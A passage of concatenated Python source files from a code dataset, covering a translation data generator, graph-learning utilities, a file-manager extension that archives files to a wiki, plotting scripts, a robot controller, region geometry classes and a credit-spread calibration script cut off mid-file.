target_encoder}\n\n    def generator(self, data_dir, tmp_dir, train):\n        \"\"\"Instance of token generator for the mn->zh task, training set.\"\"\"\n        dataset_path = (\"train.32k\"\n                        if train else \"valid.32k\")\n        train_path = os.path.join(data_dir, dataset_path)\n\n        source_token_path = os.path.join(data_dir, self.source_vocab_name())\n        target_token_path = os.path.join(data_dir, self.target_vocab_name())\n        for token_path in [source_token_path, target_token_path]:\n            with tf.gfile.GFile(token_path, mode=\"r\") as f:\n                vocab_data = \"<pad>\\n<EOS>\\n\" + f.read() + \"UNK\\n\"\n            with tf.gfile.GFile(token_path, mode=\"w\") as f:\n                f.write(vocab_data)\n        source_token_vocab = text_encoder.TokenTextEncoder(source_token_path, replace_oov=\"UNK\")\n        # Encode targets with the target vocabulary, not the source vocabulary.\n        target_token_vocab = text_encoder.TokenTextEncoder(target_token_path, replace_oov=\"UNK\")\n        return translate.token_generator(train_path + \".mn\", train_path + \".zh\",\n                                         source_token_vocab, target_token_vocab, EOS)\n\n    @property\n    def input_space_id(self):\n        return problem.SpaceID.MN_BPE_TOK\n\n    @property\n    def target_space_id(self):\n        return problem.SpaceID.ZH_BPE_TOK\n","sub_path":"tensor2tensor/data_generators/translate_mnzh_bpe32k.py","file_name":"translate_mnzh_bpe32k.py","file_ext":"py","file_size_in_byte":3989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"436120520","text":"\"\"\"\nThe MIT License\nCopyright (c) 2017 Thomas Kipf\n\nPermission is hereby granted, free of charge, to any person obtaining a\ncopy of this software and associated documentation files (the \"Software\"),\nto deal in the Software without restriction, including without limitation\nthe rights to use, copy, modify, merge, publish, distribute, sublicense,\nand/or sell copies of the Software, and to permit persons to whom the\nSoftware is furnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included\nin all copies or substantial portions of the Software.\n\nModified from https://github.com/tkipf/gae to work with citation network data.\n\"\"\"\n\nimport numpy as np\nimport pickle as pkl\nimport networkx as nx\nimport scipy.sparse as sp\nimport sys\nfrom collections import defaultdict as dd\n\nfrom graph.completion.longae.hparams import hparams\n\nnp.random.seed(1982)\n\ndef parse_index_file(filename):\n    \"\"\"Parse index file.\"\"\"\n    index = []\n    for line in open(filename):\n        index.append(int(line.strip()))\n    return index\n\n\ndef sample_mask(idx, l):\n    \"\"\"Create mask.\"\"\"\n    mask = np.zeros(l)\n    mask[idx] = 1\n    return np.array(mask, dtype=bool)\n\ndef load_graph(file):\n    graph = dd(list)\n    with open(file, 'r') as f:\n        for line in f:\n            line = line.rstrip().split(\" \")\n            graph[line[0]].append(line[1])\n\n    adj = nx.adjacency_matrix(nx.from_dict_of_lists(graph)).toarray()\n    return adj\n    \ndef output_graph(graph):\n    output = []\n    for k, v in nx.to_dict_of_lists(nx.to_networkx_graph(graph)).items():\n        for i in v:\n            output.append((k, i))\n    return output\n\ndef load_citation_data_from_file(files):\n    \"\"\"Load citation data.\"\"\"\n    with open(files[0], 'rb') as f:\n        features = np.loadtxt(f)\n    \n    with open(files[1], 'rb') as f:\n        labels = np.loadtxt(f)\n    \n    graph = dd(list)\n    with open(files[2], 'r') as f:\n        for line in f:\n            line = line.rstrip().split(\" \")\n            graph[line[0]].append(line[1])\n\n    if hparams.index_file == \"\":\n        l = len(features) // 5\n        test_idx_range = np.arange(l)\n        test_idx_reorder = np.random.permutation(test_idx_range)\n    else:\n        
test_idx_reorder = parse_index_file(hparams.index_file)\n test_idx_range = np.sort(test_idx_reorder)\n\n features[test_idx_reorder, :] = features[test_idx_range, :]\n\n adj = nx.adjacency_matrix(nx.from_dict_of_lists(graph)).tolil()\n\n labels[test_idx_reorder, :] = labels[test_idx_range, :]\n\n idx_test = test_idx_range.tolist()\n idx_train = range(hparams.training_size)\n idx_val = range(hparams.training_size, hparams.training_size + hparams.dev_size)\n\n train_mask = sample_mask(idx_train, labels.shape[0])\n val_mask = sample_mask(idx_val, labels.shape[0])\n test_mask = sample_mask(idx_test, labels.shape[0])\n\n y_train = np.zeros(labels.shape)\n y_val = np.zeros(labels.shape)\n y_test = np.zeros(labels.shape)\n y_train[train_mask, :] = labels[train_mask, :]\n y_val[val_mask, :] = labels[val_mask, :]\n y_test[test_mask, :] = labels[test_mask, :]\n \n return adj, features, y_train, y_val, y_test, train_mask, val_mask, test_mask\n\ndef sparse_to_tuple(sparse_mx):\n if not sp.isspmatrix_coo(sparse_mx):\n sparse_mx = sparse_mx.tocoo()\n coords = np.vstack((sparse_mx.row, sparse_mx.col)).transpose()\n values = sparse_mx.data\n shape = sparse_mx.shape\n return coords, values, shape\n\n\ndef split_citation_data(adj):\n \"\"\"\n Function to build test set with 10% positive links and\n the same number of randomly sampled negative links.\n NOTE: Splits are randomized and results might slightly deviate\n from reported numbers in the paper.\n \"\"\"\n\n # Remove diagonal elements\n adj = adj - sp.dia_matrix((adj.diagonal()[np.newaxis, :], [0]), shape=adj.shape)\n adj.eliminate_zeros()\n # Check that diag is zero:\n assert np.diag(adj.todense()).sum() == 0\n\n adj_triu = sp.triu(adj)\n adj_tuple = sparse_to_tuple(adj_triu)\n edges = adj_tuple[0]\n edges_all = sparse_to_tuple(adj)[0]\n num_test = int(np.floor(edges.shape[0] / 10.))\n num_val = int(np.floor(edges.shape[0] / 20.))\n if num_test == 0:\n num_test = 1\n if num_val == 0:\n num_val = 1\n\n all_edge_idx = list(range(edges.shape[0]))\n np.random.shuffle(all_edge_idx)\n val_edge_idx = all_edge_idx[:num_val]\n test_edge_idx = all_edge_idx[num_val:(num_val + num_test)]\n test_edges = edges[test_edge_idx]\n val_edges = edges[val_edge_idx]\n train_edges = np.delete(edges, np.hstack([test_edge_idx, val_edge_idx]), axis=0)\n\n def ismember(a, b, tol=5):\n rows_close = np.all(np.round(a - b[:, None], tol) == 0, axis=-1)\n return (np.all(np.any(rows_close, axis=-1), axis=-1) and\n np.all(np.any(rows_close, axis=0), axis=0))\n\n test_edges_false = []\n while len(test_edges_false) < len(test_edges):\n idx_i = np.random.randint(0, adj.shape[0])\n idx_j = np.random.randint(0, adj.shape[0])\n if idx_i == idx_j:\n continue\n if ismember([idx_i, idx_j], edges_all):\n continue\n if test_edges_false:\n if ismember([idx_j, idx_i], np.array(test_edges_false)):\n continue\n if ismember([idx_i, idx_j], np.array(test_edges_false)):\n continue\n test_edges_false.append([idx_i, idx_j])\n\n val_edges_false = []\n while len(val_edges_false) < len(val_edges):\n idx_i = np.random.randint(0, adj.shape[0])\n idx_j = np.random.randint(0, adj.shape[0])\n if idx_i == idx_j:\n continue\n if ismember([idx_i, idx_j], train_edges):\n continue\n if ismember([idx_j, idx_i], train_edges):\n continue\n if ismember([idx_i, idx_j], val_edges):\n continue\n if ismember([idx_j, idx_i], val_edges):\n continue\n if val_edges_false:\n if ismember([idx_j, idx_i], np.array(val_edges_false)):\n continue\n if ismember([idx_i, idx_j], np.array(val_edges_false)):\n continue\n 
val_edges_false.append([idx_i, idx_j])\n\n data = np.ones(train_edges.shape[0])\n\n # NOTE: the edge list only contains single direction of edge!\n return np.concatenate([test_edges, np.asarray(test_edges_false)], axis=0)\n\n","sub_path":"graph/completion/longae/utils_gcn.py","file_name":"utils_gcn.py","file_ext":"py","file_size_in_byte":6394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"640452264","text":"#encoding: utf-8\nfrom OpenOrange import *\nfrom Report import Report\nimport string\nfrom LabelControl import LabelControl\n\nclass ClassifierPaste(Report):\n\n def getClassifiers(self):\n lc = LabelControl.bring(self.tableName)\n if (lc):\n dims = lc.LabelTypes.split(\",\")\n labs = {}\n query = Query()\n query.sql = \"SELECT {Code}, {Name}, {Type} FROM [Label] \"\n if query.open():\n for rec in query:\n if (rec.Type in dims):\n if not labs.has_key(rec.Type):\n labs[rec.Type] = []\n labs[rec.Type].append( (rec.Code,rec.Name) )\n return labs\n return {}\n\n def select(self,param,value):\n dim,lab = param.split(\",\")\n self.values[dim] = lab\n self.clear()\n self.run()\n self.render()\n\n def setinitialValues(self):\n self.values = {}\n for lab in self.record.Classification.split(\",\"):\n for dim in self.classifiers.keys():\n labels = [ lb for (lb,labname) in self.classifiers[dim] ]\n if (lab in labels):\n self.values[dim] = lab\n continue\n #alert(self.values)\n\n def run(self):\n icons = [\"<IMG SRC=images/orange.png>\",\"<IMG SRC=images/nopriority.png>\"]\n self.getView().resize(400,400)\n if (not self.__dict__.has_key(\"values\")):\n from LabelType import LabelType\n self.labelTypes = LabelType.getNames()\n self.classifiers = self.getClassifiers()\n self.setinitialValues()\n initialvalues = self.record.Classification.split(\",\")\n self.printReportTitle(tr(\"Paste Classifier\"))\n\n c = \"White\"\n self.startTable()\n for dim in self.classifiers.keys():\n self.startRow()\n self.addValue(self.labelTypes[dim],Color=\"White\",BGColor=\"Gray\")\n for (lab,labname) in self.classifiers[dim]:\n bcol = \"#CC6600\"\n if self.values.get(dim,\"\") == lab:\n bcol = \"orange\"\n self.addValue(labname,CallMethod=\"select\",Color=c,BGColor=bcol,Parameter=\"%s,%s\" % (dim,lab) )\n self.endRow()\n self.row(\"\")\n self.endTable()\n\n self.startTable() \n self.startRow()\n self.addValue(tr(\"Paste\"),Bold=True,CallMethod=\"paste\")\n self.endRow()\n self.endTable()\n return\n\n def paste(self,value):\n self.record.Classification = \",\".join(self.values.values())\n self.close()\n","sub_path":"base/reports/ClassifierPaste.py","file_name":"ClassifierPaste.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"341508543","text":"import sys\nprint(sys.version)\n\nprint(\"mecplugins_wikidpad_archiver_nautilus_nemo_extension.py\")\n\n# debug by running\n#\n# nautilus -q\n# nautilus --no-desktop\n#\n# or\n# nemo -q\n# nemo --no-desktop\n\n\nimport os\nimport time\nimport locale\nimport shutil\nimport datetime\n\nfrom urllib.parse import unquote_plus\nfrom urllib.parse import urlsplit\n\nimport gi\n\ntry:\n gi.require_version('Nemo', '3.0')\n print(\"gi.require_version('Nemo', '3.0')\")\nexcept ValueError:\n gi.require_version('Nautilus', '3.0')\n print(\"gi.require_version('Nautilus', '3.0')\")\n\nfrom gi.repository import GObject\n\ntry:\n from gi.repository import Nemo as Verne\n fm = \"Nemo\"\nexcept ImportError:\n from gi.repository import Nautilus as 
Verne\n fm = \"Nautilus\"\n\nprint(fm)\n\nlocale.setlocale(locale.LC_ALL, '')\n#locale.setlocale(locale.LC_ALL, \"pt_PT\")\n\nclass ColumnExtension(GObject.GObject, Verne.MenuProvider):\n\n def __init__(self):\n pass\n\n def get_file_items(self, window, files):\n item = Verne.MenuItem(name= f\"{fm}::wikidpad\",\n label= \"Save to WikidPad {}\".format(datetime.date.today()),\n tip= \"wikidpad\",\n icon= ''\n )\n item.connect('activate', self.menu_activate_cb, files)\n return item,\n\n def menu_activate_cb(self, menu, files):\n today = str(datetime.date.today())\n print(today)\n today_dir = os.path.join(\"/home/bjorn/files/\", today)\n print(today_dir)\n try:\n os.makedirs(today_dir)\n except OSError:\n pass\n\n links= \"\\n\"\n\n files = [f for f in files if not f.is_gone()]\n print()\n for file_ in files:\n uri = unquote_plus(file_.get_uri())\n print(uri)\n src = urlsplit(uri).path\n print(src)\n name = os.path.split(src)[-1]\n print(name)\n dst = os.path.join(today_dir, name)\n print(dst)\n shutil.move(src, dst)\n link = \"[file:{}]\\n\".format(dst)\n print(link)\n links+=link\n print()\n\n\n wikipage = os.path.join(\"/home/bjorn/Dropbox/wikidata/\", f\"{today}.md\") #<-- ugly!\n\n header = \"\"\n if not os.path.exists(wikipage):\n header = time.strftime(\"## %Y-%m-%d|%A %B %d|Week %W [alias: %d %B %Y] [now] [someday] [todo_todo]\\nhttps://calendar.google.com/calendar/r/week/%Y/%m/%d\\n\\n\\n\") #.encode() # locale.getlocale()[1]\n print(header)\n else:\n print(\"no header\")\n\n with open(wikipage, \"a\") as f:\n f.write(header)\n f.write(links)\n\n\n print( \"File size \", os.stat(wikipage)[6] )\n\n","sub_path":"scripts/mecplugins_wikidpad_archiver_nautilus_nemo_extension.py","file_name":"mecplugins_wikidpad_archiver_nautilus_nemo_extension.py","file_ext":"py","file_size_in_byte":2736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"172200978","text":"import pandas as pd\nimport matplotlib.pyplot as plt\n\n#Reading File and Parsing\nfile = 'API_EN.ATM.CO2E.PC_DS2_en_excel_v2_9944766.xls'\ndata = pd.ExcelFile(file)\ndf1 = data.parse('Data', skiprows=3)\ndf1 = df1.drop([\"Country Code\", \"Indicator Name\", \"Indicator Code\"], axis=1)\ndf1 = df1.set_index(\"Country Name\")\ndf1 = df1.sort_values('2014', ascending=False)\n\n#print (df1.loc['India']['2014'])\ndf1.loc[[\"Qatar\", \"Kuwait\",\"Bahrain\",\"United Arab Emirates\",\"Saudi Arabia\",\"United States\",\"Australia\",\"Canada\",\"Russian Federation\",\"Singapore\",\"Netherlands\", \"Japan\",\"Norway\",\"Germany\", \"China\", \"United Kingdom\" ,\"France\",\"India\"], \"2014\"].plot(kind='bar')\n\n#Fromatting axis ticks\nplt.ticklabel_format(useOffset=False, style='plain', axis='y')\nplt.xticks(fontsize=8)\nplt.suptitle('CO2 emissions (metric tons per capita) 2014', fontsize=19)\n\n\nplt.show()\n","sub_path":"PerCapitaCO2Emission_2014_BarGraph.py","file_name":"PerCapitaCO2Emission_2014_BarGraph.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"596605002","text":"from ps4 import PS4Controller\nfrom Azubot import AzubotController\n\n\"\"\" This class puts all required control components together and\n starts polling for control events. These events can be sent\n by any correctly implemented controller. 
Actions received are\n then sent to the AzubotController.\n\"\"\"\nclass Application:\n # Catches actions requiring parameters to be passed.\n methodsWithParam = [ \"setLeftSpeedNorm\", \"setRightSpeedNorm\", \"setHeadAngleHorizontal\", \"setHeadAngleVertical\"]\n\n def __init__(self):\n # Initialize Azubot and Controller\n self.bot = AzubotController()\n #self.input = xboxController()\n self.input = PS4Controller()\n self.input.start()\n\n while True:\n # get actions from controller\n actions = self.input.getActions()\n for action in actions:\n if action is not None:\n # differentiate between actions with and without parameters\n if action in self.methodsWithParam:\n # run action\n result = getattr(self.bot, action)(actions[action])\n else:\n # run action\n result = getattr(self.bot, action)() \nif __name__ == \"__main__\":\n Application()\n","sub_path":"Control/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"594749087","text":"import json\nimport math\nimport numpy as np\nimport metadata\n\nbutterflies_by_image_id = {i.image_id: i for i in metadata.load()}\n\nstrings = []\nname_ids = {}\n\ndef get_name_id(value):\n if value not in name_ids:\n name_ids[value] = len(strings)\n strings.append(value)\n return name_ids[value]\n\ndef create_json_dict(item, x, y):\n result = {\n 'x': x,\n 'y': y,\n 'occId': item.occurence_id,\n 'image': item.image_id,\n 'properties': [get_name_id(p) for p in (item.family, item.genus, item.species, item.subspecies, item.sex, item.country, item.pretty_name)]\n }\n\n if item.latitude != '':\n result['lat'] = float(item.latitude)\n if item.longitude != '':\n result['lon'] = float(item.longitude)\n if item.pretty_time is not None:\n result['time'] = item.pretty_time\n\n return result\n\nDATAQUADS_PER_FILE = 16\n\nclass DataQuads():\n def __init__(self, depth):\n self.depth = depth\n self.quad_count = 2**(depth - 9)\n self.quads = {}\n\n def insert(self, item):\n x, y = item['x'], item['y']\n\n quad_x = math.floor(x * self.quad_count)\n quad_y = math.floor(y * self.quad_count)\n\n if quad_x not in self.quads:\n self.quads[quad_x] = {}\n if quad_y not in self.quads[quad_x]:\n self.quads[quad_x][quad_y] = []\n \n self.quads[quad_x][quad_y].append(item)\n\n def save(self):\n dataquad_files = {}\n for x in self.quads:\n file_x = x // DATAQUADS_PER_FILE\n for y in self.quads[x]:\n file_y = y // DATAQUADS_PER_FILE\n if (file_x, file_y) not in dataquad_files:\n dataquad_files[(file_x, file_y)] = {}\n dataquad_file = dataquad_files[(file_x, file_y)]\n if x not in dataquad_file:\n dataquad_file[x] = {}\n dataquad_file[x][y] = self.quads[x][y]\n for file_x, file_y in dataquad_files:\n json_string = json.dumps(dataquad_files[(file_x, file_y)])\n with open('data/meta/{:d}_{:d}_{:d}.json'.format(self.depth, file_x, file_y), 'w') as file:\n file.write(json_string)\n\ndata = json.load(open('data/clusters.json', 'r'))\n\nresult = {}\nfor depth_str in data:\n items = data[depth_str]\n depth = int(depth_str)\n quads = DataQuads(depth)\n \n for item in items:\n x, y, image_id = item['x'], -item['y'], item['image']\n\n if image_id not in butterflies_by_image_id:\n continue\n\n quads.insert(create_json_dict(butterflies_by_image_id[image_id], x, y))\n \n if depth < 13:\n result[depth] = quads.quads\n else:\n quads.save()\n\nfrom image_loader import ImageDataset\ndataset = ImageDataset()\ncodes = np.load('data/latent_codes_embedded_moved.npy')\n\nfinal_depth = 
max(int(d) for d in data.keys()) + 1\n\nfinal_depth_quads = DataQuads(final_depth)\n\nfor i in range(codes.shape[0]):\n x, y, image_id = codes[i, 0], -codes[i, 1], dataset.hashes[i]\n \n if image_id not in butterflies_by_image_id:\n continue\n\n final_depth_quads.insert(create_json_dict(butterflies_by_image_id[image_id], x, y))\n\nfinal_depth_quads.save()\n\nresult['names'] = strings\njson_string = json.dumps(result)\nwith open('data/meta.json', 'w') as file:\n file.write(json_string)\n","sub_path":"create_json.py","file_name":"create_json.py","file_ext":"py","file_size_in_byte":3340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"24422587","text":"#!/usr/bin/env python3\n\nimport bottle\n\nbottle.BaseRequest.MEMFILE_MAX = 2**40\nclass Server(bottle.ServerAdapter):\n def run(self, handler): # pragma: no cover\n from cherrypy import wsgiserver\n self.options['bind_addr'] = (self.host, self.port)\n self.options['wsgi_app'] = handler\n\n certfile = self.options.get('certfile')\n if certfile:\n del self.options['certfile']\n keyfile = self.options.get('keyfile')\n if keyfile:\n del self.options['keyfile']\n\n server = wsgiserver.CherryPyWSGIServer(**self.options)\n if certfile:\n server.ssl_certificate = certfile\n if keyfile:\n server.ssl_private_key = keyfile\n server.max_request_body_size = 2**40\n server.max_request_header_size = 2**40\n server.request_queue_size = 1024\n\n try:\n server.start()\n finally:\n server.stop()\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"600621957","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\nfrom __future__ import absolute_import, division, print_function, unicode_literals\nfrom . 
import PixCoord, PixelRegion, SkyRegion, BoundingBox, Mask\nimport numpy as np\n\n__all__ = ['CompoundPixelRegion', 'CompoundSkyRegion']\n\n\nclass CompoundPixelRegion(PixelRegion):\n \"\"\"\n Represents the logical combination of two regions in pixel coordinates.\n \"\"\"\n\n def __init__(self, region1, region2, operator, meta=None, visual=None):\n if not isinstance(region1, PixelRegion):\n raise TypeError(\"region1 must be a PixelRegion\")\n if not isinstance(region2, PixelRegion):\n raise TypeError(\"region2 must be a PixelRegion\")\n if not callable(operator):\n raise TypeError(\"operator must be callable\")\n\n self.region1 = region1\n self.region2 = region2\n if meta is None:\n self.meta = region1.meta\n else:\n self.meta = meta\n if visual is None:\n self.visual = region1.visual\n else:\n self.visual = visual\n self.operator = operator\n self._repr_params = [('component 1', self.region1),\n ('component 2', self.region2),\n ('operator', self.operator),\n ]\n\n def contains(self, pixcoord):\n in_reg = self.operator(self.region1.contains(pixcoord), self.region2.contains(pixcoord))\n if self.meta.get('inverted', False):\n return not in_reg\n else:\n return in_reg\n\n def to_mask(self, mode='center', subpixels=1):\n if mode != 'center':\n raise NotImplementedError\n\n mask1 = self.region1.to_mask(mode=mode, subpixels=subpixels)\n mask2 = self.region2.to_mask(mode=mode, subpixels=subpixels)\n\n # Common bounding box\n bbox = BoundingBox(\n ixmin=min(mask1.bbox.ixmin, mask2.bbox.ixmin),\n ixmax=max(mask1.bbox.ixmax, mask2.bbox.ixmax),\n iymin=min(mask1.bbox.iymin, mask2.bbox.iymin),\n iymax=max(mask1.bbox.iymax, mask2.bbox.iymax)\n )\n\n # Bounding boxes must not extend over array, see #168\n bbox_borders = np.array([bbox.ixmin, bbox.ixmax, bbox.iymin, bbox.iymax])\n if (bbox_borders < 0).any():\n raise NotImplementedError(\"Bounding box must be within array for \"\n \"compound regions, see #168\")\n\n # Pad mask1.data and mask2.data to get the same shape\n padded_data = list()\n for mask in (mask1, mask2):\n pleft = mask.bbox.ixmin - bbox.ixmin\n pright = bbox.ixmax - mask.bbox.ixmax\n ptop = bbox.iymax - mask.bbox.iymax\n pbottom = mask.bbox.iymin - bbox.iymin\n padded_data.append(np.pad(mask.data,\n ((ptop, pbottom), (pleft, pright)),\n 'constant'))\n\n data = self.operator(*np.array(padded_data, dtype=np.int))\n return Mask(data=data, bbox=bbox)\n\n def to_sky(self, wcs):\n skyreg1 = self.region1.to_sky(wcs=wcs)\n skyreg2 = self.region2.to_sky(wcs=wcs)\n return CompoundSkyRegion(region1=skyreg1,\n operator=self.operator,\n region2=skyreg2, meta=self.meta, visual=self.visual)\n\n def as_patch(self, **kwargs):\n raise NotImplementedError\n\n def to_shapely(self, **kwargs):\n raise NotImplementedError\n\n def bounding_box(self, **kwargs):\n raise NotImplementedError\n\n @property\n def area(self):\n raise NotImplementedError\n\n\nclass CompoundSkyRegion(SkyRegion):\n \"\"\"\n Represents the logical combination of two regions in sky coordinates.\n \"\"\"\n\n def __init__(self, region1, region2, operator, meta=None, visual=None):\n if not isinstance(region1, SkyRegion):\n raise TypeError(\"region1 must be a SkyRegion\")\n if not isinstance(region2, SkyRegion):\n raise TypeError(\"region2 must be a SkyRegion\")\n if not callable(operator):\n raise TypeError(\"operator must be callable\")\n\n self.region1 = region1\n self.region2 = region2\n if meta is None:\n self.meta = region1.meta\n else:\n self.meta = meta\n if visual is None:\n self.visual = region1.visual\n else:\n self.visual = 
visual\n self.operator = operator\n\n self._repr_params = [('component 1', self.region1),\n ('component 2', self.region2),\n ('operator', self.operator),\n ]\n\n def contains(self, skycoord, wcs):\n in_reg = self.operator(self.region1.contains(skycoord, wcs),\n self.region2.contains(skycoord, wcs))\n if self.meta.get('inverted', False):\n return not in_reg\n else:\n return in_reg\n\n def to_pixel(self, wcs):\n pixreg1 = self.region1.to_pixel(wcs=wcs)\n pixreg2 = self.region2.to_pixel(wcs=wcs)\n return CompoundPixelRegion(region1=pixreg1,\n operator=self.operator,\n region2=pixreg2, meta=self.meta, visual=self.visual)\n\n def as_patch(self, ax, **kwargs):\n raise NotImplementedError\n","sub_path":"regions/core/compound.py","file_name":"compound.py","file_ext":"py","file_size_in_byte":5405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"9407088","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCDS Research\nAuthor: Jordan Giebas\nAdvisor: Dr. Albert Cohen\nMichigan State University\nMarch 16, 2017\n\nCompany: Frontier Communications Corp.\n\n\"\"\"\n\nimport matplotlib.pyplot as plt\n\n# Working with Excel\nimport xlrd\n\n# Datetime Module for time-series data\nimport datetime\n\n# Mathematical Computations\nimport math\nfrom scipy.stats import norm\nfrom scipy.optimize import fsolve\n\n\ndef averageOfList( List1 ):\n \n return sum(List1)/float(len(List1))\n\ndef firstDayCheck( day_month_String ):\n \n firstDayList = [\"01-01\", \"01-04\", \"01-07\", \"01-10\"]\n \n if day_month_String in firstDayList:\n \n return True\n \n return False\n\ndef secondDayCheck( day_month_String ):\n \n secondDayList = [\"02-01\", \"02-04\", \"02-07\", \"02-10\"]\n \n if day_month_String in secondDayList:\n \n return True\n \n return False\n\ndef thirdDayCheck( day_month_String ):\n \n thirdDayList = [\"03-01\", \"03-04\", \"03-07\", \"03-10\"]\n \n if day_month_String in thirdDayList:\n \n return True\n \n return False\n\ndef fourthDayCheck( day_month_String ):\n \n fourthDayList = [\"04-01\", \"04-04\", \"04-07\", \"04-10\"]\n \n if day_month_String in fourthDayList:\n \n return True\n \n return False\n \ndef notWeekendCheck( dayString ):\n \n weekendList = [\"Saturday\", \"Sunday\"]\n \n if dayString in weekendList:\n \n return False\n \n return True\n\n# Input Param: \ndef dateToQuarter( dateString ):\n\n Q1_list = [\"01\", \"02\", \"03\"] \n Q2_list = [\"04\", \"05\", \"06\"] \n Q3_list = [\"07\", \"08\", \"09\"] \n \n L = dateString.split(\"-\")\n Month = L[1]\n #print(\"Month: \", Month)\n Year = L[2]\n #print(\"Year: \", Year)\n \n if Month in Q1_list:\n \n return \"1.\" + Year\n \n elif Month in Q2_list:\n \n return \"2.\" + Year\n\n elif Month in Q3_list:\n \n return \"3.\" + Year\n \n else:\n \n return \"4.\" + Year \n \n \n## E^Market = A*phi(d1) - N*e^M*phi(d2)\ndef fsolve_function( init, E_market, sigma_E_market, r, M, A):\n\n sigma_A = init[0]\n N = init[1]\n\n #Aux functions\n d1 = (math.log(A/N) + (r + 0.5*(sigma_A**2))*M)/(sigma_A*math.sqrt(M))\n d2 = (math.log(A/N) + (r - 0.5*(sigma_A**2)))/(sigma_A*math.sqrt(M))\n \n #return\n #out = A*norm.cdf(d1) - N*math.exp(-1*(r*M))*norm.cdf(d2) - E_market\n #out = sigma_E_market - sigma_A*A*norm.cdf(d1)\n out = [A*norm.cdf(d1) - N*math.exp(-1*(r*M))*norm.cdf(d2) - E_market]\n out.append(sigma_A*A*norm.cdf(d1) - sigma_E_market*E_market)\n\n return out\n\n\ndef delta_spread( A, calib_sigma_A, E_market, sigma_E_market, calibN, r, M, spd ):\n \n d1 = (math.log(A/calibN) + ((r + 
0.5*(CalibSigA**2))*M))/(CalibSigA*math.sqrt(M))\n d2 = (math.log(A/calibN) + ((r - 0.5*(CalibSigA**2))*M))/(CalibSigA*math.sqrt(M)) \n \n spread_calib = (-1.0/M)*math.log( norm.cdf(d2) + ((A*math.exp(r*M))/calibN)*norm.cdf(-1.0*d1) )\n spread_calib *= 10000.0\n \n #return (spd-spread_calib2)\n return [(spd-spread_calib), spread_calib]\n\n\n#establish the map between quarter and paramteres for Beazer Home\n# map[quarter] = list[ STD, LTD, B (liabilities), E (Equity), sigma_E (volatility), r (10 Yr Treasury Rate), Credit_Spread ]\nquarterToData = dict()\n\n# Open the Excel Workbook, read in short term debt\nbook = xlrd.open_workbook( \"RiteAid_1factor.xlsx\" )\nSTD_data = book.sheet_by_index(0) # sheet containing Short Term Debt Data (Quarterly)\nLTD_data = book.sheet_by_index(1) # sheet containing Long Term Debt Data (Quarterly)\nLib_data = book.sheet_by_index(2) # sheet containing Liability Data (Quarterly)\nEqt_data = book.sheet_by_index(3) # sheet containing Equity Data (Quarterly)\nVol_data = book.sheet_by_index(4) # sheet containing Volatility Data (Daily)\nRte_data = book.sheet_by_index(5) # sheet containing 10 Yr Treasury Data (Daily)\nSpd_data = book.sheet_by_index(6) # sheet containing Spread Data (Daily)\nBta_data = book.sheet_by_index(7) # sheet containing BetaEM Data (Daily)\nFsp_data = book.sheet_by_index(8) # sheet containing Final Stock Price Data (Daily)\n\n\n###########################################\n#\n# First process everything that's daily\n# And put it in the date=>data map\n#\n###########################################\n\ndateToData = dict()\ndateWeekendBool = dict()\ndateList = list()\n\n## process volatility data\ndates = Vol_data.col_slice( colx=0, start_rowx=0 )\nnEntries = len(dates)\n\nfor i in range( 0, nEntries ):\n \n ## Put in volatility data \n date_i_float = Vol_data.cell_value(i,0)\n date_i = datetime.datetime( *xlrd.xldate_as_tuple( date_i_float, book.datemode ) ).strftime(\"%A %d. %B %Y\")\n date_i_formatted = datetime.datetime( *xlrd.xldate_as_tuple( date_i_float, book.datemode ) ).strftime('%d-%m-%Y')\n day = date_i.split(\" \")[0]\n \n dateList.append( date_i_formatted )\n \n if notWeekendCheck( day ):\n \n dateWeekendBool[ date_i_formatted ] = True\n\n dateToData[ date_i_formatted ] = [ day ]\n dateToData[ date_i_formatted ].append( float( Vol_data.cell_value( i,1 ) ) )\n dateToData[ date_i_formatted ].append( float( Spd_data.cell_value( i,1 ) ) )\n dateToData[ date_i_formatted ].append( float( Bta_data.cell_value( i,1 ) ) )\n dateToData[ date_i_formatted ].append( float( Fsp_data.cell_value( i,1 ) ) )\n \n else:\n \n dateWeekendBool[ date_i_formatted ]= False\n \n\n## Put in the treasury data\ndates_Rte = Rte_data.col_slice( colx=0, start_rowx=0 )\nnEntries_Rte = len( dates_Rte )\nfor i in range( 0, nEntries_Rte ):\n \n date_i_float_rte = Rte_data.cell_value(i,0)\n date_i_formatted_rte = datetime.datetime( *xlrd.xldate_as_tuple( date_i_float_rte, book.datemode ) ).strftime('%d-%m-%Y') \n dateToData[ date_i_formatted_rte ].append( float( Rte_data.cell_value( i,1 ) ) )\n\n\n###################################################\n# @ this point, all the daily data\n# is in the map. 
